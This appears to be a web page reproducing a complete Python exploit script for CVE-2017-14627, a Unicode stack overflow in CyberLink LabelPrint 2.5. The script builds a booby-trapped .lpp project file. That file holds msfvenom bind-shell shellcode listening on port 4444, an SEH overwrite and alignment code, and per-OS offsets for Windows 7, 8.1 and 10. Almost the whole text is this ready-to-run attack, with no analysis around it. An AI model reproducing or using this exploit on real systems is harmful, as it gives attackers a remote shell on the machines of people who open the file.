扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 |
#!/usr/bin/python # Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow # Date: September 23, 2017 # Exploit Author: f3ci # Vendor Homepage: https://www.cyberlink.com/ # Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe # Version: 2.5 # Tested on: Windows 7x86, Windows8.1x64, Windows 10 # CVE : CVE-2017-14627 # # Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops. # this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation. def exp(): header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e" "\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46" "\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22" "\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65" "\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73" "\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32" "\x30\x31\x37\x22\x3e") filename2 = "labelprint_poc_universal.lpp" f = open(filename2,'w') junk = "A" * 790 nseh = "\x61\x42" seh = "\x2c\x44" nop = "\x42" #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python buf = "" buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ" buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk" buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7" buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9" buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M" buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD" buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB" buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj" buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP" buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW" buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM" buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F" buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv" buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA" #preparing address for decoding ven = nop #nop/inc edx ven += "\x54" #push esp ven += nop#nop/inc edx ven += "\x58" #pop eax ven += nop#nop/inc edx ven += "\x05\x1B\x01" #add eax 01001B00 universal ven += nop#nop/inc edx ven += "\x2d\x01\x01" #sub eax 01001000 ven += nop#nop/inc edx ven += "\x50" #push eax ven += nop#nop/inc edx ven += "\x5c" #pop esp #we need to encode the RET address, since C3 is bad char. #preparing ret opcode ven += nop#nop/inc edx ven += "\x25\x7e\x7e" #and eax,7e007e00 ven += nop#nop/inc edx ven += "\x25\x01\x01" #and eax,01000100 ven += nop#nop/inc edx ven += "\x35\x7f\x7f" #xor eax,7f007f00 ven += nop#nop/inc edx ven += "\x05\x44\x44" #add eax,44004400 ven += nop#nop/inc edx ven += "\x57" #push edi ven += nop#nop/inc edx ven += "\x50" #push eax ven += junk2#depending OS #custom venetian ven += "\x58" #pop eax ven += nop#nop/inc edx ven += "\x58" #pop eax ven += nop#nop/inc edx ven += align#depending OS ven += nop#nop/inc edx ven += "\x2d\x01\x01" #add eax, 01000100 #align eax to our buffer ven += nop#nop/inc edx ven += "\x50" #push eax ven += nop#nop/inc edx #call esp 0x7c32537b MFC71U.dll ven += "\x5C" #pop esp ven += nop#nop/inc edx ven += "\x58" #pop eax ven += nop#nop/inc edx ven += "\x05\x53\x7c" #add eax 7c005300 part of call esp ven += nop#nop/inc edx ven += "\x50" #push eax ven += junk1#depending OS ven += "\x7b\x32" #part of call esp #preparing for shellcode ven += nop * 114#junk ven += "\x57" #push edi ven += nop#nop/inc edx ven += "\x58" #pop eax ven += nop#nop/inc edx ven += align2 #depending OS ven += nop#nop/inc edx ven += "\x2d\x01\x01" #sub eax,01000100 ven += nop#nop/inc edx ven += buf#shellcode sisa =nop * (15000-len(junk+nseh+seh+ven)) payload = junk+nseh+seh+ven+sisa bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n" bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a" "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e") f.write(header+ "\n" + bug) print "[+] File", filename2, "successfully created!" print "[*] Now open project file", filename2, "with CyberLink LabelPrint." print "[*] Good luck ;)" f.close() print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->" print "[*] by f3ci & modpr0be <research[at]spentera.id>" print "[*] <------------------------------------------------->\n" print "\t1.Windows 7 x86 bindshell on port 4444" print "\t2.Windows 8.1 x64 bindshell on port 4444" print "\t3.Windows 10 x64 bindshell on port 4444\n" input = input("Choose Target OS : ") try: if input == 1: align = "\x05\x09\x01"#add eax,01000400 align2= "\x05\x0A\x01"#add eax, 01000900 junk1 = '\x42' * 68 #junk for win7x86 junk2 = '\x42' * 893#junk for win7x86 exp() elif input == 2: align = "\x05\x09\x01"#add eax,01000400 align2= "\x05\x0A\x01"#add eax, 01000900 junk1 = '\x42' * 116#junk for win8.1x64 junk2 = '\x42' * 845#junk for win8.1x64 exp() elif input == 3: align = "\x05\x05\x01"#add eax,01000400 align2= "\x05\x06\x01"#add eax, 01000900 junk1 = '\x42' * 136#junk for win10x64 junk2 = '\x42' * 313#junk for win10x64 exp() else: print "Choose the right one :)" except: print "" |
体验盒子
